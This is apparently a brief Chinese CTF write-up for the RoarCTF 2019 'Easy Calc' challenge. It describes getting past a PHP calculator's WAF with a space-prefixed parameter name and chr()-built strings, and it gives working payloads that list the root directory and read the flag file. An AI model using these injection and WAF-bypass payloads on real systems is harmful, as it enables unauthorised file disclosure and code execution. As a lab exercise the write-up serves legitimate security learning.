[RoarCTF 2019]Easy Calc表达式注入 - 幕布
接着发现了api的接口地点calc.php和get的参数
直接url后面加上calc.php显示了一部分源码
可以发现过滤了很多的东西,并且计算器的页面上是只允许输入数字的,所以可以用带空格的数字绕过(用? num代替?num)
scandir("/")扫一下根目录,"/"被waf过滤了,单双引号也被过滤了。
? num=var_dump(scandir(chr(47)))
?num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
var_dump(…)绕过包含单双引号的waf
file_get_content()获取文件内容